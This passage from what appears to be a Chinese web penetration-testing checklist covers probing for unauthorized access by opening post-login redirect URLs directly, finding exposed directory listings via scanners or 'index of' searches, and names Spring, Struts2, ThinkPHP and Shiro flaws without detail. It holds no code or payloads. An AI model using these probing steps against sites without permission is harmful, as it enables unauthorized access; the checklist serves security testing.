2) Look for URL information in order to find the address the application redirects to after the username and password are verified, then open that address directly and see whether it is accessible without authorization. In the case shown here the post-login redirect address was visible in the source, and opening it directly tested for unauthorized access.

11. Directory traversal (directory listing)

Test methods:

Scan the web application with a web vulnerability scanner, or use a search engine to find sites whose page title contains the keyword "index of" and browse the exposed listing.

12. Framework vulnerabilities

The common framework vulnerabilities are as follows; I will not explain them one by one here.

Spring framework vulnerabilities
Struts2 framework vulnerabilities
ThinkPHP framework vulnerabilities
Shiro framework vulnerabilities


Origin blog.csdn.net/qq_22903531/article/details/131329832